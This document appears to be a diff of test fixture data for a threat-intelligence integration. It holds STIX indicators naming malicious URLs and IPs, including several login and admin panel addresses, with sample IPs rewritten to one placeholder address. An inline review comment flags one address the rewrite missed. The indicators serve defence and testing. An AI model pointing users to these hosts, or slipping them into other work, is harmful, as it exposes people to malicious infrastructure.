http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:08.953Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -17385,7 +17385,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386683184Z", + "ingested": "2021-12-13T08:38:40.024636300Z", "original": "{\"created\":\"2020-02-06T02:10:15.947Z\",\"description\":\"TS ID: 55290730799; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--9586420f-3737-47b6-8d58-526f629d66e2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-06T02:10:15.947Z\",\"name\":\"mal_url: http://justwer.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://justwer.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:15.947Z\"}", "category": "threat", "type": "indicator", @@ -17404,7 +17404,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 173.247.252.61", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55290730784; iType: mal_ip; State: active; Org: InMotion Hosting; Source: CyberCrime", "modified": "2020-02-06T02:10:15.988Z", "valid_from": "2020-02-06T02:10:15.988Z", 
@@ -17426,12 +17426,12 @@ "first_seen": "2020-02-06T02:10:15.988Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "173.247.252.61" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386687803Z", - "original": "{\"created\":\"2020-02-06T02:10:15.988Z\",\"description\":\"TS ID: 55290730784; iType: mal_ip; State: active; Org: InMotion Hosting; Source: CyberCrime\",\"id\":\"indicator--4d0f3370-af7d-4902-abea-65d9f924458b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-52\"],\"modified\":\"2020-02-06T02:10:15.988Z\",\"name\":\"mal_ip: 173.247.252.61\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '173.247.252.61']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:15.988Z\"}", + "ingested": "2021-12-13T08:38:40.024643700Z", + "original": "{\"created\":\"2020-02-06T02:10:15.988Z\",\"description\":\"TS ID: 55290730784; iType: mal_ip; State: active; Org: InMotion Hosting; Source: CyberCrime\",\"id\":\"indicator--4d0f3370-af7d-4902-abea-65d9f924458b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-52\"],\"modified\":\"2020-02-06T02:10:15.988Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:15.988Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -17482,7 +17482,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386691980Z", + "ingested": "2021-12-13T08:38:40.024649400Z", "original": "{\"created\":\"2020-02-06T02:10:22.051Z\",\"description\":\"TS ID: 55290730781; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--12dac6fb-e53b-4742-9cc4-da362e880571\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-06T02:10:22.051Z\",\"name\":\"mal_url: http://u-knlt.com/Pablo/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://u-knlt.com/Pablo/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:22.051Z\"}", "category": "threat", "type": "indicator", @@ -17501,7 +17501,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 91.215.169.220", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55290730808; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime", "modified": "2020-02-06T02:10:23.024Z", "valid_from": "2020-02-06T02:10:23.024Z", 
@@ -17523,12 +17523,12 @@ "first_seen": "2020-02-06T02:10:23.024Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "91.215.169.220" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386696459Z", - "original": "{\"created\":\"2020-02-06T02:10:23.024Z\",\"description\":\"TS ID: 55290730808; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime\",\"id\":\"indicator--d5c7a00c-4ab5-4501-b79c-4e96838e5602\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-02-06T02:10:23.024Z\",\"name\":\"mal_ip: 91.215.169.220\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '91.215.169.220']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:23.024Z\"}", + "ingested": "2021-12-13T08:38:40.024657100Z", + "original": "{\"created\":\"2020-02-06T02:10:23.024Z\",\"description\":\"TS ID: 55290730808; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime\",\"id\":\"indicator--d5c7a00c-4ab5-4501-b79c-4e96838e5602\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-02-06T02:10:23.024Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:23.024Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -17579,7 +17579,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386701007Z", + "ingested": "2021-12-13T08:38:40.024661100Z", "original": "{\"created\":\"2020-02-06T02:10:35.597Z\",\"description\":\"TS ID: 55290730780; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--524c1a55-264d-4f41-a854-1f0601921675\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-06T02:10:35.597Z\",\"name\":\"mal_url: http://f0378370.xsph.ru/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0378370.xsph.ru/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:35.597Z\"}", "category": "threat", "type": "indicator", @@ -17598,7 +17598,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://85.204.116.145/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55290730787; iType: mal_url; State: active; Org: N-b Tv Sat Srl; Source: CyberCrime", "modified": "2020-02-06T02:10:59.132Z", "valid_from": "2020-02-06T02:10:59.132Z", 
@@ -17622,16 +17622,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://85.204.116.145/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "85.204.116.145", - "full": "http://85.204.116.145/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386705225Z", - "original": "{\"created\":\"2020-02-06T02:10:59.132Z\",\"description\":\"TS ID: 55290730787; iType: mal_url; State: active; Org: N-b Tv Sat Srl; Source: CyberCrime\",\"id\":\"indicator--d8d588e2-5ab4-4937-9051-ae93e79c0204\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-02-06T02:10:59.132Z\",\"name\":\"mal_url: http://85.204.116.145/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://85.204.116.145/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:59.132Z\"}", + "ingested": "2021-12-13T08:38:40.024665700Z", + "original": "{\"created\":\"2020-02-06T02:10:59.132Z\",\"description\":\"TS ID: 55290730787; iType: mal_url; State: active; Org: N-b Tv Sat Srl; Source: CyberCrime\",\"id\":\"indicator--d8d588e2-5ab4-4937-9051-ae93e79c0204\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-02-06T02:10:59.132Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:10:59.132Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -17681,7 +17681,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386709573Z", + "ingested": "2021-12-13T08:38:40.024671Z", "original": "{\"created\":\"2020-02-06T02:11:08.205Z\",\"description\":\"TS ID: 55290730776; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--6b38040c-6578-43c4-8cec-a426d1079a96\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-06T02:11:08.205Z\",\"name\":\"mal_url: http://f0396918.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0396918.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:11:08.205Z\"}", "category": "threat", "type": "indicator", @@ -17733,7 +17733,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386713761Z", + "ingested": "2021-12-13T08:38:40.024675600Z", "original": "{\"created\":\"2020-02-06T02:11:15.653Z\",\"description\":\"TS ID: 55290730807; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--22ba0c46-ef00-43cc-a2e1-ff75417cf11d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-06T02:11:15.653Z\",\"name\":\"mal_url: http://gpi-q.com/cup/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gpi-q.com/cup/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:11:15.653Z\"}", "category": "threat", "type": "indicator", 
@@ -17784,7 +17784,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386717909Z", + "ingested": "2021-12-13T08:38:40.024680200Z", "original": "{\"created\":\"2020-02-06T02:11:17.072Z\",\"description\":\"TS ID: 55290730801; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--257bcf28-e6ee-46e8-b9fe-d192fdc7c959\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-06T02:11:17.072Z\",\"name\":\"mal_url: http://l5056942.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://l5056942.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:11:17.072Z\"}", "category": "threat", "type": "indicator", @@ -17836,7 +17836,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386722387Z", + "ingested": "2021-12-13T08:38:40.024683800Z", "original": "{\"created\":\"2020-02-06T02:11:17.098Z\",\"description\":\"TS ID: 55290730797; iType: mal_url; State: active; Org: LLC Eximius; Source: CyberCrime\",\"id\":\"indicator--788aa60d-57c8-4a4c-9666-d6869ccd6c49\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-06T02:11:17.098Z\",\"name\":\"mal_url: http://h146438.s21.test-hf.su/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://h146438.s21.test-hf.su/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:11:17.098Z\"}", "category": "threat", "type": "indicator", 
@@ -17888,7 +17888,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386728830Z", + "ingested": "2021-12-13T08:38:40.024689Z", "original": "{\"created\":\"2020-02-06T02:11:27.123Z\",\"description\":\"TS ID: 55290730782; iType: mal_url; State: active; Org: Hotwire Fision; Source: CyberCrime\",\"id\":\"indicator--29909afa-ad21-493c-b420-870dbc8dd0da\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-02-06T02:11:27.123Z\",\"name\":\"mal_url: http://tranpip.com/vla/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tranpip.com/vla/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:11:27.123Z\"}", "category": "threat", "type": "indicator", @@ -17939,7 +17939,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386733088Z", + "ingested": "2021-12-13T08:38:40.024696600Z", "original": "{\"created\":\"2020-02-06T02:11:37.189Z\",\"description\":\"TS ID: 55290730803; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--eb5264f6-1f6e-4d1e-a813-d668ef8e6e0e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-06T02:11:37.189Z\",\"name\":\"mal_url: http://l1430a3c.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://l1430a3c.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:11:37.189Z\"}", "category": "threat", "type": "indicator", 
@@ -17991,7 +17991,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386738077Z", + "ingested": "2021-12-13T08:38:40.024704100Z", "original": "{\"created\":\"2020-02-06T02:12:51.488Z\",\"description\":\"TS ID: 55290730778; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--c5829f98-8034-4bab-b591-9d3fbda9f448\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-06T02:12:51.488Z\",\"name\":\"mal_url: http://f0391270.xsph.ru/dashboard/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0391270.xsph.ru/dashboard/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:12:51.488Z\"}", "category": "threat", "type": "indicator", @@ -18010,7 +18010,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://85.204.116.144/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55290730800; iType: mal_url; State: active; Org: N-b Tv Sat Srl; Source: CyberCrime", "modified": "2020-02-06T02:12:52.562Z", "valid_from": "2020-02-06T02:12:52.562Z", 
@@ -18034,16 +18034,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://85.204.116.144/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "85.204.116.144", - "full": "http://85.204.116.144/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386742906Z", - "original": "{\"created\":\"2020-02-06T02:12:52.562Z\",\"description\":\"TS ID: 55290730800; iType: mal_url; State: active; Org: N-b Tv Sat Srl; Source: CyberCrime\",\"id\":\"indicator--14575771-256c-4f2f-b4bc-7b96c6805b24\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-02-06T02:12:52.562Z\",\"name\":\"mal_url: http://85.204.116.144/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://85.204.116.144/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:12:52.562Z\"}", + "ingested": "2021-12-13T08:38:40.024709600Z", + "original": "{\"created\":\"2020-02-06T02:12:52.562Z\",\"description\":\"TS ID: 55290730800; iType: mal_url; State: active; Org: N-b Tv Sat Srl; Source: CyberCrime\",\"id\":\"indicator--14575771-256c-4f2f-b4bc-7b96c6805b24\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-02-06T02:12:52.562Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:12:52.562Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -18094,7 +18094,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.386747545Z",
+ "ingested": "2021-12-13T08:38:40.024716700Z",
 "original": "{\"created\":\"2020-02-06T02:13:24.038Z\",\"description\":\"TS ID: 55290730798; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--41ca379f-0e97-452f-bed7-0dcaa6509a87\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-02-06T02:13:24.038Z\",\"name\":\"mal_url: http://xmpzi.icu/blue/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://xmpzi.icu/blue/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:13:24.038Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -18145,7 +18145,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.386752374Z",
+ "ingested": "2021-12-13T08:38:40.024723900Z",
 "original": "{\"created\":\"2020-02-06T02:13:26.405Z\",\"description\":\"TS ID: 55290730786; iType: mal_url; State: active; Org: QuadraNet; Source: CyberCrime\",\"id\":\"indicator--5b354705-abe0-4b58-b088-aba7ddc92d6c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-35\"],\"modified\":\"2020-02-06T02:13:26.405Z\",\"name\":\"mal_url: http://155.94.210.79/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://155.94.210.79/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:13:26.405Z\"}",
 "category": "threat",
 "type": "indicator",
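Review bot: The -18145 hunk updates only `"ingested"` and leaves `http://155.94.210.79/login` in the `"original"` context line, which makes it the one IP-literal URL in these hunks that was not rewritten to `89.160.20.156`; the `"name"` and `url.*` fields for this record sit outside the hunk and presumably still carry the old address too. Every other indicator with a bare-IP URL (-17302, -17598, -18010, -18215, -18413, -18464) was rewritten, so this looks like a miss in the input sample rather than a deliberate exception. If it is intentional, a sentence in the PR description saying which addresses were kept and why would save the next reader the same question.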
@@ -18196,7 +18196,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386756832Z", + "ingested": "2021-12-13T08:38:40.024731Z", "original": "{\"created\":\"2020-02-06T02:14:04.592Z\",\"description\":\"TS ID: 55290730804; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--6f406e7c-e62d-4431-b7eb-d8bc42d48b54\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-02-06T02:14:04.592Z\",\"name\":\"mal_url: http://lf9a7e2b.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://lf9a7e2b.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:14:04.592Z\"}", "category": "threat", "type": "indicator", @@ -18215,7 +18215,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://5.188.60.16/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55290730806; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", "modified": "2020-02-06T02:14:13.434Z", "valid_from": "2020-02-06T02:14:13.434Z", 
@@ -18239,16 +18239,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://5.188.60.16/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "5.188.60.16", - "full": "http://5.188.60.16/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386761521Z", - "original": "{\"created\":\"2020-02-06T02:14:13.434Z\",\"description\":\"TS ID: 55290730806; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--1a0f27f7-a8a7-4dd5-b5cc-a7146221fc31\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-06T02:14:13.434Z\",\"name\":\"mal_url: http://5.188.60.16/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://5.188.60.16/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:14:13.434Z\"}", + "ingested": "2021-12-13T08:38:40.024738300Z", + "original": "{\"created\":\"2020-02-06T02:14:13.434Z\",\"description\":\"TS ID: 55290730806; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--1a0f27f7-a8a7-4dd5-b5cc-a7146221fc31\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-06T02:14:13.434Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:14:13.434Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -18266,7 +18266,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 137.74.20.60", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55290730796; iType: mal_ip; State: active; Org: OVH SAS; Source: CyberCrime", "modified": "2020-02-06T02:14:13.474Z", "valid_from": "2020-02-06T02:14:13.474Z", @@ -18288,12 +18288,12 @@ "first_seen": "2020-02-06T02:14:13.474Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "137.74.20.60" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386766120Z", - "original": "{\"created\":\"2020-02-06T02:14:13.474Z\",\"description\":\"TS ID: 55290730796; iType: mal_ip; State: active; Org: OVH SAS; Source: CyberCrime\",\"id\":\"indicator--72bcbdc1-6c42-4fe9-b6b2-2a8519672418\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-16\"],\"modified\":\"2020-02-06T02:14:13.474Z\",\"name\":\"mal_ip: 137.74.20.60\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '137.74.20.60']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:14:13.474Z\"}", + "ingested": "2021-12-13T08:38:40.024745400Z", + "original": "{\"created\":\"2020-02-06T02:14:13.474Z\",\"description\":\"TS ID: 55290730796; iType: mal_ip; State: active; Org: OVH SAS; Source: CyberCrime\",\"id\":\"indicator--72bcbdc1-6c42-4fe9-b6b2-2a8519672418\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-16\"],\"modified\":\"2020-02-06T02:14:13.474Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:14:13.474Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -18343,7 +18343,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386771199Z", + "ingested": "2021-12-13T08:38:40.024752800Z", "original": "{\"created\":\"2020-02-06T02:14:13.506Z\",\"description\":\"TS ID: 55290730793; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--a2c76402-f9d0-4ea1-9ed0-b035bce4c7a6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-06T02:14:13.506Z\",\"name\":\"mal_url: http://tikkies.eu/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tikkies.eu/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:14:13.506Z\"}", "category": "threat", "type": "indicator", @@ -18394,7 +18394,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386775998Z", + "ingested": "2021-12-13T08:38:40.024759900Z", "original": "{\"created\":\"2020-02-06T02:14:14.285Z\",\"description\":\"TS ID: 55290730805; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--2e110e0c-f7af-4738-bed2-057bebad6f44\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-06T02:14:14.285Z\",\"name\":\"mal_url: http://lb1a9935.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://lb1a9935.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:14:14.285Z\"}", "category": "threat", "type": "indicator", 
@@ -18413,7 +18413,7 @@
 "object_marking_refs": [
 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_url: http://69.61.38.147/login",
+ "name": "mal_url: http://89.160.20.156/login",
 "description": "TS ID: 55290730788; iType: mal_url; State: active; Org: Cyber Wurx LLC; Source: CyberCrime",
 "modified": "2020-02-06T02:14:30.841Z",
 "valid_from": "2020-02-06T02:14:30.841Z",
@@ -18437,16 +18437,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://69.61.38.147/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "69.61.38.147", - "full": "http://69.61.38.147/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386780657Z", - "original": "{\"created\":\"2020-02-06T02:14:30.841Z\",\"description\":\"TS ID: 55290730788; iType: mal_url; State: active; Org: Cyber Wurx LLC; Source: CyberCrime\",\"id\":\"indicator--20a1654d-6008-4d85-a2f0-cc9eaadabe43\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-23\"],\"modified\":\"2020-02-06T02:14:30.841Z\",\"name\":\"mal_url: http://69.61.38.147/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://69.61.38.147/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:14:30.841Z\"}", + "ingested": "2021-12-13T08:38:40.024767Z", + "original": "{\"created\":\"2020-02-06T02:14:30.841Z\",\"description\":\"TS ID: 55290730788; iType: mal_url; State: active; Org: Cyber Wurx LLC; Source: CyberCrime\",\"id\":\"indicator--20a1654d-6008-4d85-a2f0-cc9eaadabe43\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-23\"],\"modified\":\"2020-02-06T02:14:30.841Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:14:30.841Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -18464,7 +18464,7 @@
 "object_marking_refs": [
